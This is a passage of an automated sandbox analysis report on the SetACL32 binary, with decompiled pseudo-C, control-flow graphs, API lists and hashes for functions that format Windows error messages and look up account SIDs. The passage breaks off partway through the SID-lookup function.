              • GetLastError.KERNEL32(?,?,?), ref: 012A22B0
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: ErrorLast$CloseProcessToken$AdjustChangeCurrentFindHandleLookupNotificationOpenPrivilegePrivilegesValue
              • String ID: failed with: $ the privilege $@Mhv$Enabling$SetPrivilege
              • API String ID: 3881061509-2580886937
              • Opcode ID: 78ce5eaf88c2079f149ca7c294ef4d1ca5cae6ac52f0f5e30d7318760c249728
              • Instruction ID: d90497da8d5ecddc62a36f0723454e65b3f7fcb36a77d36c3dcd24ef3de065b6
              • Opcode Fuzzy Hash: 78ce5eaf88c2079f149ca7c294ef4d1ca5cae6ac52f0f5e30d7318760c249728
              • Instruction Fuzzy Hash: 00D1F530A20209DFEB18DF64DD48BADBB76FF94314F54825CE605AB295D734AA84CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012A88E0 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 315librarymemorywindowCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 199 12a88e0-12a895e 200 12a8968-12a8974 199->200 201 12a8960-12a8966 199->201 202 12a8aca-12a8ad6 200->202 203 12a897a-12a89ac 200->203 201->200 207 12a8c1b-12a8c26 202->207 208 12a8adc-12a8b03 #13 202->208 205 12a89ae-12a89b7 203->205 206 12a89d4-12a8a09 call 12a1ee0 203->206 205->206 209 12a89b9 205->209 228 12a8a0f-12a8a30 call 12982b0 206->228 210 12a8c28-12a8c3b LoadLibraryExW 207->210 211 12a8c44-12a8c64 207->211 213 12a8b09-12a8b10 208->213 214 12a8cfc 208->214 217 12a89c0-12a89c2 209->217 218 12a8c3d-12a8c42 210->218 219 12a8c81-12a8ca6 FormatMessageW 210->219 211->219 220 12a8c66-12a8c7e LoadLibraryExW 211->220 213->214 215 12a8b16-12a8b1f 213->215 216 12a8d02-12a8d5b call 129a2d0 call 12a8e30 call 12cae19 214->216 222 12a8b20-12a8b29 215->222 224 12a89c8-12a89d2 217->224 225 12a8a63-12a8a8d 217->225 218->219 226 12a8ca8-12a8cb0 219->226 227 12a8ce9 219->227 220->219 222->222 230 12a8b2b-12a8b2f 222->230 224->206 224->217 232 12a8a90-12a8a99 225->232 234 12a8cb3-12a8cbc 226->234 231 12a8cef-12a8cf1 227->231 228->216 242 12a8a36-12a8a4b 228->242 230->214 237 12a8b35-12a8b50 call 12cae5d 230->237 231->216 238 12a8cf3-12a8cfa FreeLibrary 231->238 232->232 239 12a8a9b-12a8ab6 call 12a1ee0 232->239 234->234 235 12a8cbe-12a8ce7 call 12a1ee0 LocalFree 234->235 235->231 254 12a8b52-12a8b7f SysStringByteLen SysAllocStringByteLen 237->254 255 12a8b87 237->255 238->216 239->228 247 12a8abb-12a8ac5 call 12cae27 242->247 248 12a8a4d-12a8a5b 242->248 247->216 252 12a8d5c call 12cf35f 248->252 253 12a8a61 248->253 258 12a8d61-12a8d66 call 12cbea0 252->258 253->247 254->258 259 12a8b85 254->259 260 12a8b89-12a8b95 255->260 264 12a8d6b-12a8d75 call 12cbea0 258->264 259->260 260->264 265 12a8b9b-12a8ba9 260->265 267 12a8bb0-12a8bb9 265->267 267->267 269 12a8bbb-12a8bdb call 12a1ee0 267->269 269->216 272 12a8be1-12a8be5 269->272 273 12a8be7-12a8bee SysFreeString 272->273 274 12a8bf4-12a8bf9 272->274 273->274 275 12a8c0b-12a8c16 call 12cae27 274->275 276 12a8bfb-12a8c04 call 12cae58 274->276 275->216 276->275
              C-Code - Quality: 61%
              			E012A88E0(void* __ebx, long* __ecx, signed int __edx, void* __edi, void* __esi) {
				long _v8;
				char _v16;
				signed int _v20;
				char _v540;
				char _v1060;
				signed int _v1064;
				long _v1068;
				long _v1084;
				long _v1088;
				struct HINSTANCE__* _v1092;
				struct HINSTANCE__* _v1108;
				long* _v1112;
				short _v1116;
				signed int _v1120;
				long* _v1124;
				char _v1128;
				long* _v1132;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				signed char _t101;
				signed int _t103;
				signed int _t110;
				signed int _t118;
				signed int _t119;
				signed int _t125;
				signed int _t126;
				signed int _t129;
				signed int _t130;
				char* _t133;
				signed int _t134;
				long _t143;
				intOrPtr _t148;
				signed int _t149;
				long _t153;
				void* _t155;
				signed char _t158;
				short _t165;
				intOrPtr* _t169;
				signed int _t170;
				signed int _t171;
				void* _t172;
				signed int _t173;
				long _t179;
				signed int _t180;
				intOrPtr* _t181;
				struct HINSTANCE__* _t188;
				void* _t189;
				void* _t190;
				long _t192;
				void* _t193;
				void* _t194;
				long* _t195;
				void* _t196;
				signed int _t200;
				void* _t201;

				_t185 = __edx;
				_t198 = _t200;
				_push(0xffffffff);
				_push(0x12ea04f);
				_push( *[fs:0x0]);
				_t201 = _t200 - 0x45c;
				_t87 =  *0x1309018; // 0xedd8d3b4
				_t88 = _t87 ^ _t200;
				_v20 = _t88;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t88);
				 *[fs:0x0] =  &_v16;
				_t192 = __edx;
				_v1112 = __ecx;
				_v1116 = __ecx;
				_v1132 = __ecx;
				_v1120 = 0;
				 *__ecx = 0;
				__ecx[4] = 0;
				__ecx[5] = 7;
				 *__ecx = 0;
				_v8 = 0;
				_t188 = 0;
				_v1120 = 1;
				_t153 = 0x1300;
				if(__edx == 0) {
					_t192 = GetLastError();
				}
				if((_t192 & 0x80005000) != 0x80005000) {
					__eflags = (_t192 & 0x80007000) - 0x80007000;
					if((_t192 & 0x80007000) != 0x80007000) {
						_t59 = _t192 - 0x834; // -2100
						__eflags = _t59 - 0x383;
						if(_t59 > 0x383) {
							__eflags = (_t192 & 0xc0000b00) - 0xc0000b00;
							_t158 = 0 | (_t192 & 0xc0000b00) != 0xc0000b00;
							_t100 = _t192 & 0x80000700;
							__eflags = _t100 - 0x80000700;
							_t101 = _t100 & 0xffffff00 | _t100 != 0x80000700;
							__eflags = _t101 & _t158;
							if((_t101 & _t158) == 0) {
								_t188 = LoadLibraryExW(L"pdh.dll", 0, 2);
								__eflags = _t188;
								_t153 =  !=  ? 0x1b00 : _t153;
							}
						} else {
							_t188 = LoadLibraryExW(L"netmsg.dll", 0, 2);
							__eflags = _t188;
							if(_t188 != 0) {
								_t153 = 0x1b00;
							}
						}
						_v1116 = 0;
						_t103 = FormatMessageW(_t153, _t188, _t192, 0x400,  &_v1116, 0, 0); // executed
						__eflags = _t103;
						if(_t103 == 0) {
							_t154 = _v1112;
						} else {
							_t185 = _v1116;
							_t165 = _v1116;
							_t69 = _t165 + 2; // 0x2
							_t194 = _t69;
							do {
								_t110 =  *_t165;
								_t165 = _t165 + 2;
								__eflags = _t110;
							} while (_t110 != 0);
							_t154 = _v1112;
							E012A1EE0(_v1112, _v1112, _t185, _t188, _t194, _t185, _t165 - _t194 >> 1);
							LocalFree(_v1116);
							_v1116 = 0;
						}
						__eflags = _t188;
						if(_t188 != 0) {
							FreeLibrary(_t188);
						}
						goto L49;
					} else {
						_t118 =  &_v1116;
						__imp__#13(_t118,  &_v540, 0x103,  &_v1060, 0x103);
						__eflags = _t118;
						if(_t118 < 0) {
							L48:
							_t154 = _v1112;
							goto L49;
						} else {
							__eflags = _v1116 - 0xd;
							if(_v1116 == 0xd) {
								goto L48;
							} else {
								_t169 =  &_v540;
								_t185 = _t169 + 2;
								do {
									_t119 =  *_t169;
									_t169 = _t169 + 2;
									__eflags = _t119;
								} while (_t119 != 0);
								_t170 = _t169 - _t185;
								__eflags = _t170;
								_t171 = _t170 >> 1;
								if(__eflags == 0) {
									goto L48;
								} else {
									_push(0xc);
									_t195 = E012CAE5D(_t153, _t188, _t192, __eflags);
									_t201 = _t201 + 4;
									_v1124 = _t195;
									_v8 = 2;
									__eflags = _t195;
									if(_t195 == 0) {
										_t195 = 0;
										__eflags = 0;
										goto L27;
									} else {
										_t133 =  &_v540;
										_t195[1] = 0;
										_t195[2] = 1;
										__imp__#149(_t133);
										_t134 =  &_v540;
										__imp__#150(_t134, _t133);
										 *_t195 = _t134;
										__eflags = _t134;
										if(_t134 == 0) {
											goto L51;
										} else {
											L27:
											_v8 = 0;
											_v1124 = _t195;
											__eflags = _t195;
											if(_t195 == 0) {
												goto L52;
											} else {
												_v8 = 3;
												_t185 =  *_t195;
												_t173 =  *_t195;
												_t190 = _t173 + 2;
												do {
													_t125 =  *_t173;
													_t173 = _t173 + 2;
													__eflags = _t125;
												} while (_t125 != 0);
												_t154 = _v1112;
												_t126 = E012A1EE0(_v1112, _v1112, _t185, _t190, _t195, _t185, _t173 - _t190 >> 1);
												_v8 = 0;
												asm("lock xadd [esi+0x8], eax");
												__eflags = (_t126 | 0xffffffff) == 1;
												if((_t126 | 0xffffffff) == 1) {
													_t129 =  *_t195;
													__eflags = _t129;
													if(_t129 != 0) {
														__imp__#6(_t129);
														 *_t195 = 0;
													}
													_t130 = _t195[1];
													__eflags = _t130;
													if(_t130 != 0) {
														E012CAE58(_t130);
														_t201 = _t201 + 4;
														_t195[1] = 0;
													}
													_push(0xc);
													E012CAE27(_t195);
													_t201 = _t201 + 8;
												}
												goto L49;
											}
										}
									}
								}
							}
						}
					}
				} else {
					_v1108 = _t188;
					_v1092 = _t188;
					_v1088 = 7;
					_v1108 = 0;
					_v8 = 1;
					if((_t192 & 0x00005000) != 0x5000) {
						L8:
						_v1084 = 0;
						_v1068 = 0;
						_v1064 = 7;
						E012A1EE0(_t153,  &_v1084, _t185, _t188, _t192, 0x12f983c, 0);
						_v1120 = 3;
					} else {
						_t148 =  *0x13099f8; // 0x80005000
						_t180 = 0;
						if(_t148 == 0) {
							goto L8;
						} else {
							while(_t148 != _t192) {
								_t148 =  *((intOrPtr*)(0x1309a00 + _t180 * 8));
								_t180 = _t180 + 1;
								if(_t148 != 0) {
									continue;
								} else {
									goto L8;
								}
								goto L9;
							}
							_t186 =  *((intOrPtr*)(0x13099fc + _t180 * 8));
							_t181 =  *((intOrPtr*)(0x13099fc + _t180 * 8));
							_v1084 = 0;
							_v1068 = 0;
							_v1064 = 7;
							_t36 = _t181 + 2; // 0x2
							_t196 = _t36;
							do {
								_t149 =  *_t181;
								_t181 = _t181 + 2;
								__eflags = _t149;
							} while (_t149 != 0);
							E012A1EE0(_t153,  &_v1084, _t186, _t188, _t196, _t186, _t181 - _t196 >> 1);
							_v1120 = 3;
						}
					}
					L9:
					_v8 = 0;
					_t154 = _v1112;
					E012982B0(_v1112, _v1112,  &_v1084);
					_t185 = _v1064;
					if(_t185 < 8) {
						L49:
						_t202 = _t201 - 0x14;
						_v1124 = _t201 - 0x14;
						_v1128 = "\n";
						_v1124 = 0x12fb626;
						E0129A2D0(_t202,  &_v1128);
						_v1120 = _v1120 | 0x00000004;
						E012A8E30(_t154, _t154);
						 *[fs:0x0] = _v16;
						_pop(_t189);
						_pop(_t193);
						_pop(_t155);
						return E012CAE19(_t154, _t155, _v20 ^ _t198, _t185, _t189, _t193);
					} else {
						_t179 = _v1084;
						_t185 = 2 + _t185 * 2;
						_t143 = _t179;
						if(_t185 < 0x1000) {
							L16:
							_push(_t185);
							E012CAE27(_t179);
							_t201 = _t201 + 8;
							goto L49;
						} else {
							_t171 =  *(_t179 - 4);
							_t185 = _t185 + 0x23;
							if(_t143 - _t171 + 0xfffffffc > 0x1f) {
								E012CF35F(_t154, _t171, _t185, __eflags);
								L51:
								E012CBEA0(0x8007000e);
								L52:
								E012CBEA0(0x8007000e);
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_t172 = _t171 - 1;
								__eflags = _t172 - 0x4f;
								if(_t172 > 0x4f) {
									L60:
									return 1;
								} else {
									switch( *((intOrPtr*)(( *(_t172 + 0x12a8dd4) & 0x000000ff) * 4 +  &M012A8DB8))) {
										case 0:
											__eax = 5;
											return 5;
											goto L61;
										case 1:
											return 2;
											goto L61;
										case 2:
											goto L60;
										case 3:
											__eax = 0x50;
											return 0x50;
											goto L61;
										case 4:
											__eax = 0x57;
											return 0x57;
											goto L61;
										case 5:
											__eax = 0x70;
											return 0x70;
											goto L61;
									}
								}
							} else {
								goto L16;
							}
						}
					}
				}
				L61:
			}



























































              0x012a88e0
              0x012a88e1
              0x012a88e3
              0x012a88e5
              0x012a88f0
              0x012a88f1
              0x012a88f7
              0x012a88fc
              0x012a88fe
              0x012a8901
              0x012a8902
              0x012a8903
              0x012a8904
              0x012a8908
              0x012a890e
              0x012a8912
              0x012a8918
              0x012a891e
              0x012a8926
              0x012a8930
              0x012a8936
              0x012a893d
              0x012a8944
              0x012a894c
              0x012a894f
              0x012a8951
              0x012a8957
              0x012a895e
              0x012a8966
              0x012a8966
              0x012a8974
              0x012a8ad1
              0x012a8ad6
              0x012a8c1b
              0x012a8c21
              0x012a8c26
              0x012a8c4b
              0x012a8c52
              0x012a8c55
              0x012a8c5a
              0x012a8c5f
              0x012a8c62
              0x012a8c64
              0x012a8c75
              0x012a8c7c
              0x012a8c7e
              0x012a8c7e
              0x012a8c28
              0x012a8c37
              0x012a8c39
              0x012a8c3b
              0x012a8c3d
              0x012a8c3d
              0x012a8c3b
              0x012a8c8b
              0x012a8c9e
              0x012a8ca4
              0x012a8ca6
              0x012a8ce9
              0x012a8ca8
              0x012a8ca8
              0x012a8cae
              0x012a8cb0
              0x012a8cb0
              0x012a8cb3
              0x012a8cb3
              0x012a8cb6
              0x012a8cb9
              0x012a8cb9
              0x012a8cbe
              0x012a8ccc
              0x012a8cd7
              0x012a8cdd
              0x012a8cdd
              0x012a8cef
              0x012a8cf1
              0x012a8cf4
              0x012a8cf4
              0x00000000
              0x012a8adc
              0x012a8af4
              0x012a8afb
              0x012a8b01
              0x012a8b03
              0x012a8cfc
              0x012a8cfc
              0x00000000
              0x012a8b09
              0x012a8b09
              0x012a8b10
              0x00000000
              0x012a8b16
              0x012a8b16
              0x012a8b1c
              0x012a8b20
              0x012a8b20
              0x012a8b23
              0x012a8b26
              0x012a8b26
              0x012a8b2b
              0x012a8b2b
              0x012a8b2d
              0x012a8b2f
              0x00000000
              0x012a8b35
              0x012a8b35
              0x012a8b3c
              0x012a8b3e
              0x012a8b41
              0x012a8b47
              0x012a8b4e
              0x012a8b50
              0x012a8b87
              0x012a8b87
              0x00000000
              0x012a8b52
              0x012a8b52
              0x012a8b58
              0x012a8b60
              0x012a8b67
              0x012a8b6e
              0x012a8b75
              0x012a8b7b
              0x012a8b7d
              0x012a8b7f
              0x00000000
              0x012a8b85
              0x012a8b89
              0x012a8b89
              0x012a8b8d
              0x012a8b93
              0x012a8b95
              0x00000000
              0x012a8b9b
              0x012a8b9b
              0x012a8ba2
              0x012a8ba4
              0x012a8ba6
              0x012a8bb0
              0x012a8bb0
              0x012a8bb3
              0x012a8bb6
              0x012a8bb6
              0x012a8bbb
              0x012a8bc9
              0x012a8bce
              0x012a8bd5
              0x012a8bda
              0x012a8bdb
              0x012a8be1
              0x012a8be3
              0x012a8be5
              0x012a8be8
              0x012a8bee
              0x012a8bee
              0x012a8bf4
              0x012a8bf7
              0x012a8bf9
              0x012a8bfc
              0x012a8c01
              0x012a8c04
              0x012a8c04
              0x012a8c0b
              0x012a8c0e
              0x012a8c13
              0x012a8c13
              0x00000000
              0x012a8bdb
              0x012a8b95
              0x012a8b7f
              0x012a8b50
              0x012a8b2f
              0x012a8b10
              0x012a8b03
              0x012a897a
              0x012a897c
              0x012a8982
              0x012a8988
              0x012a8992
              0x012a899b
              0x012a89ac
              0x012a89d4
              0x012a89e1
              0x012a89eb
              0x012a89f5
              0x012a89ff
              0x012a8a09
              0x012a89ae
              0x012a89ae
              0x012a89b3
              0x012a89b7
              0x00000000
              0x012a89c0
              0x012a89c0
              0x012a89c8
              0x012a89cf
              0x012a89d2
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a89d2
              0x012a8a63
              0x012a8a6a
              0x012a8a6c
              0x012a8a76
              0x012a8a80
              0x012a8a8a
              0x012a8a8a
              0x012a8a90
              0x012a8a90
              0x012a8a93
              0x012a8a96
              0x012a8a96
              0x012a8aa7
              0x012a8aac
              0x012a8aac
              0x012a89b7
              0x012a8a0f
              0x012a8a0f
              0x012a8a19
              0x012a8a22
              0x012a8a27
              0x012a8a30
              0x012a8d02
              0x012a8d02
              0x012a8d0d
              0x012a8d13
              0x012a8d1e
              0x012a8d28
              0x012a8d2d
              0x012a8d36
              0x012a8d43
              0x012a8d4b
              0x012a8d4c
              0x012a8d4d
              0x012a8d5b
              0x012a8a36
              0x012a8a36
              0x012a8a3c
              0x012a8a43
              0x012a8a4b
              0x012a8abb
              0x012a8abb
              0x012a8abd
              0x012a8ac2
              0x00000000
              0x012a8a4d
              0x012a8a4d
              0x012a8a50
              0x012a8a5b
              0x012a8d5c
              0x012a8d61
              0x012a8d66
              0x012a8d6b
              0x012a8d70
              0x012a8d75
              0x012a8d76
              0x012a8d77
              0x012a8d78
              0x012a8d79
              0x012a8d7a
              0x012a8d7b
              0x012a8d7c
              0x012a8d7d
              0x012a8d7e
              0x012a8d7f
              0x012a8d80
              0x012a8d81
              0x012a8d84
              0x012a8db2
              0x012a8db7
              0x012a8d86
              0x012a8d8d
              0x00000000
              0x012a8d9a
              0x012a8d9f
              0x00000000
              0x00000000
              0x012a8d99
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x012a8da0
              0x012a8da5
              0x00000000
              0x00000000
              0x012a8da6
              0x012a8dab
              0x00000000
              0x00000000
              0x012a8dac
              0x012a8db1
              0x00000000
              0x00000000
              0x012a8d8d
              0x012a8a61
              0x00000000
              0x012a8a61
              0x012a8a5b
              0x012a8a4b
              0x012a8a30
              0x00000000

              APIs
              • GetLastError.KERNEL32(EDD8D3B4,00000000,00000000), ref: 012A8960
              • #13.ACTIVEDS(?,?,00000103,?,00000103,EDD8D3B4,00000000,00000000), ref: 012A8AFB
              • SysStringByteLen.OLEAUT32(?), ref: 012A8B67
              • SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 012A8B75
              • SysFreeString.OLEAUT32(-00000001), ref: 012A8BE8
              • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,EDD8D3B4,00000000,00000000), ref: 012A8C31
              • LoadLibraryExW.KERNEL32(pdh.dll,00000000,00000002,EDD8D3B4,00000000,00000000), ref: 012A8C6F
              • FormatMessageW.KERNELBASE(00001300,00000000,00000000,00000400,?,00000000,00000000,EDD8D3B4,00000000,00000000), ref: 012A8C9E
              • LocalFree.KERNEL32(00000000,00000000,-00000002), ref: 012A8CD7
              • FreeLibrary.KERNEL32(00000000), ref: 012A8CF4
              • _com_issue_error.COMSUPP ref: 012A8D66
              • _com_issue_error.COMSUPP ref: 012A8D70
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.398762235.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
              • Associated: 00000003.00000002.398756749.0000000001290000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398812155.00000000012EE000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398831084.0000000001309000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.398837590.000000000130C000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1290000_SetACL32.jbxd
              Similarity
              • API ID: FreeLibraryString$ByteLoad_com_issue_error$AllocErrorFormatLastLocalMessage
              • String ID: @Mhv$netmsg.dll$pdh.dll
              • API String ID: 2660706180-3992057081
              • Opcode ID: 124fda70d068503363da7af49e6470b908e0df6a04ad8bb92ca3a50c48f69a5a
              • Instruction ID: 7ca0532f9a19ed9d5345208507d9f97c2821639af9c4fec969e2f8436fefd6b5
              • Opcode Fuzzy Hash: 124fda70d068503363da7af49e6470b908e0df6a04ad8bb92ca3a50c48f69a5a
              • Instruction Fuzzy Hash: 1DC1E4B1A106158FDB24CF28CC557AAB7F8AF44705F40419DE70AE7282EB74AE84CF95
              Uniqueness

              Uniqueness Score: -1.00%

              Function 012C8D30 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 285COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 463 12c8d30-12c8d68 464 12c8d6c-12c8d84 463->464 465 12c8d6a 463->465 466 12c8d88-12c8d8c 464->466 467 12c8d86 464->467 465->464 468 12c8d8e-12c8d90 466->468 469 12c8d92-12c8d98 466->469 467->466 470 12c8d9c-12c8dbf LookupAccountNameW GetLastError 468->470 469->470 471 12c8d9a 469->471 472 12c8dd5-12c8dea 470->472 473 12c8dc1-12c8dd4 GetLastError 470->473 471->470 474 12c8dec-12c8df1 472->474 475 12c8e4b-12c8e6c 472->475 478 12c8ffc call 129cee0 474->478 479 12c8df7-12c8dfc 474->479 476 12c8e6e-12c8e74 475->476 477 12c8ea8-12c8eb3 475->477 482 12c8e7a-12c8ea5 call 12a1e80 call 12ccde0 476->482 483 12c9006 call 129cee0 476->483 480 12c8eb5 477->480 481 12c8eb7-12c8ebb 477->481 492 12c9001 call 12a1e60 478->492 485 12c8dfe-12c8e03 479->485 486 12c8e25-12c8e2e call 12cae5d 479->486 480->481 488 12c8ebd-12c8ebf 481->488 489 12c8ec1-12c8ec5 481->489 482->477 496 12c900b-12c9010 call 12cf35f 483->496 485->492 493 12c8e09-12c8e14 call 12cae5d 485->493 503 12c8e30-12c8e48 call 12ccde0 486->503 497 12c8ec9-12c8ee1 LookupAccountNameW 488->497 489->497 498 12c8ec7 489->498 492->483 493->496 507 12c8e1a-12c8e23 493->507 504 12c8ef0-12c8ef8 497->504 505 12c8ee3-12c8eeb 497->505 498->497 503->475 510 12c8f00-12c8f09 504->510 515 12c8f8b-12c8f90 505->515 507->503 510->510 514 12c8f0b-12c8f1e call 12a1ee0 510->514 524 12c8f89 514->524 525 12c8f20-12c8f22 514->525 517 12c8fbb-12c8fbd 515->517 518 12c8f92-12c8f9f 515->518 522 12c8fbf-12c8fcc 517->522 523 12c8fe8-12c8ffb 517->523 520 12c8fb1-12c8fb8 call 12cae27 518->520 521 12c8fa1-12c8faf 518->521 520->517 521->496 521->520 528 12c8fde-12c8fe5 call 12cae27 522->528 529 12c8fce-12c8fdc 522->529 524->515 525->524 526 12c8f24-12c8f2d IsValidSid 525->526 526->524 530 12c8f2f-12c8f33 526->530 528->523 529->496 529->528 533 12c8f44-12c8f4d IsValidSid 530->533 534 12c8f35-12c8f3e call 12d3434 530->534 537 12c8f4f-12c8f68 GetLengthSid call 12d4006 533->537 538 12c8f82 533->538 534->533 537->538 543 12c8f6a-12c8f77 CopySid 537->543 541 12c8f84-12c8f87 538->541 541->524 543->541 544 12c8f79-12c8f7f call 12d3434 543->544 544->538
              C-Code - Quality: 58%
              			E012C8D30(WCHAR* __ecx, WCHAR* __edx, long _a4, signed int _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				union _SID_NAME_USE _v16;
				long _v20;
				long _v24;
				signed int _v28;
				signed int _v32;
				WCHAR* _v36;
				union _SID_NAME_USE _v40;
				signed int _v44;
				signed int _v48;
				WCHAR* _v52;
				intOrPtr _v56;
				signed int _v60;
				signed int _v64;
				union _SID_NAME_USE* _v68;
				char _v72;
				long _v76;
				void** _v80;
				union _SID_NAME_USE* _v84;
				long _v88;
				long _v92;
				void* _v96;
				signed int _v100;
				WCHAR* _v104;
				WCHAR* _v108;
				WCHAR* _v112;
				WCHAR* _v116;
				intOrPtr _v120;
				WCHAR* _v124;
				WCHAR* _v128;
				WCHAR* _v132;
				signed int _v136;
				char _v140;
				signed int _v152;
				void** _v156;
				union _SID_NAME_USE* _v160;
				WCHAR* _v164;
				WCHAR* _v168;
				char _v172;
				long _v176;
				WCHAR* _v208;
				WCHAR* _v244;
				char _v252;
				signed int _v256;
				char _v260;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t200;
				WCHAR* _t203;
				WCHAR* _t204;
				signed int _t207;
				WCHAR* _t209;
				signed int _t210;
				signed int _t211;
				void* _t214;
				signed int _t220;
				signed int _t221;
				WCHAR* _t225;
				signed int _t226;
				signed int _t227;
				WCHAR* _t229;
				signed int _t230;
				signed int _t231;
				signed int _t233;
				long _t235;
				WCHAR* _t237;
				signed int _t243;
				signed int _t248;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t269;
				signed int _t271;
				signed int _t273;
				signed int _t275;
				signed int _t277;
				signed int _t279;
				signed int _t281;
				WCHAR* _t295;
				intOrPtr* _t303;
				intOrPtr* _t304;
				signed int _t307;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				long _t315;
				signed int _t317;
				WCHAR* _t322;
				WCHAR* _t324;
				void* _t327;
				signed int _t330;
				long _t331;
				WCHAR* _t333;
				void* _t334;
				signed int _t335;
				WCHAR* _t337;
				void* _t339;
				signed int _t340;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				void* _t349;
				intOrPtr* _t352;
				WCHAR* _t354;
				signed int _t355;
				signed int _t361;
				WCHAR* _t365;
				union _SID_NAME_USE* _t366;
				void* _t369;
				WCHAR* _t370;
				WCHAR* _t374;
				signed int _t421;
				intOrPtr _t425;
				signed int _t429;
				short* _t433;
				intOrPtr* _t437;
				short* _t441;
				signed int _t465;
				void* _t467;
				signed int _t469;
				intOrPtr _t474;
				void** _t480;
				void* _t482;
				signed int _t483;
				signed int _t485;
				signed int _t486;
				signed int _t487;
				signed int _t488;
				signed int _t489;
				signed int _t490;
				void* _t492;
				WCHAR* _t493;
				signed int _t494;
				signed int _t498;
				void* _t500;
				signed int _t501;
				signed int _t503;
				void* _t513;

				_push(0xffffffff);
				_push(0x12ecd15);
				_push( *[fs:0x0]);
				_t501 = _t500 - 0x30;
				_t200 =  *0x1309018; // 0xedd8d3b4
				_push(_t200 ^ _t497);
				 *[fs:0x0] =  &_v16;
				_t203 = __edx;
				_v36 = __edx;
				_t333 = __ecx;
				_t352 = _a4;
				_t433 = _t352;
				if( *((intOrPtr*)(_t352 + 0x14)) >= 8) {
					_t433 =  *_t352;
				}
				 *(_t352 + 0x10) = 0;
				 *_t433 = 0;
				_v24 = 0;
				_v20 = 0;
				_t354 = _t203;
				if(_t203[0xa] >= 8) {
					_t354 =  *_t203;
				}
				if(_t333[8] != 0) {
					__eflags = _t333[0xa] - 8;
					_t204 = _t333;
					if(_t333[0xa] >= 8) {
						_t204 =  *_t333;
					}
				} else {
					_t204 = 0;
				}
				_t436 =  &_v24;
				LookupAccountNameW(_t204, _t354, 0, _t436, 0,  &_v20,  &_v40);
				if(GetLastError() == 0x7a) {
					_t207 = _v24;
					_t478 = 0;
					_t463 = 0;
					_v28 = _t207;
					_v64 = 0;
					_v60 = 0;
					_v56 = 0;
					__eflags = _t207;
					if(_t207 == 0) {
						L18:
						_v8 = 0;
						_t355 = _v20;
						_t463 = 0;
						_t436 = 0;
						_v32 = _t355;
						_v52 = 0;
						_v48 = 0;
						_v44 = 0;
						_v28 = 0;
						__eflags = _t355;
						if(_t355 == 0) {
							L21:
							_t209 = _v36;
							_v8 = 1;
							__eflags = _t209[0xa] - 8;
							if(_t209[0xa] >= 8) {
								_t209 =  *_t209;
							}
							__eflags = _t333[8];
							if(_t333[8] != 0) {
								__eflags = _t333[0xa] - 8;
								if(_t333[0xa] >= 8) {
									_t333 =  *_t333;
								}
							} else {
								_t333 = 0;
							}
							_t210 = LookupAccountNameW(_t333, _t209, _t478,  &_v24, _t436,  &_v20,  &_v40);
							__eflags = _t210;
							if(_t210 != 0) {
								_t359 = _v28;
								_t437 = _v28;
								_t52 = _t437 + 2; // 0x101
								_t334 = _t52;
								do {
									_t211 =  *_t437;
									_t437 = _t437 + 2;
									__eflags = _t211;
								} while (_t211 != 0);
								_t436 = _t437 - _t334 >> 1;
								E012A1EE0(_t334, _a4, _t436, _t463, _t478, _t359, _t436);
								_t335 = _a8;
								__eflags = _t335;
								if(_t335 != 0) {
									__eflags = _t478;
									if(_t478 != 0) {
										_t311 = IsValidSid(_t478);
										__eflags = _t311;
										if(_t311 != 0) {
											_t312 =  *_t335;
											__eflags = _t312;
											if(_t312 != 0) {
												E012D3434(_t312);
												_t501 = _t501 + 4;
												 *_t335 = 0;
											}
											_t313 = IsValidSid(_t478);
											__eflags = _t313;
											if(_t313 == 0) {
												L40:
												_t349 = 0;
												__eflags = 0;
											} else {
												_t315 = GetLengthSid(_t478);
												_push(1);
												_push(_t315);
												_a4 = _t315;
												_t349 = E012D4006();
												_t501 = _t501 + 8;
												__eflags = _t349;
												if(_t349 == 0) {
													goto L40;
												} else {
													_t317 = CopySid(_a4, _t349, _t478);
													__eflags = _t317;
													if(_t317 == 0) {
														E012D3434(_t349);
														_t501 = _t501 + 4;
														goto L40;
													}
												}
											}
											 *_a8 = _t349;
										}
									}
								}
								_t333 = 0;
								__eflags = 0;
							} else {
								_t333 = GetLastError();
							}
							_t361 = _v52;
							__eflags = _t361;
							if(_t361 == 0) {
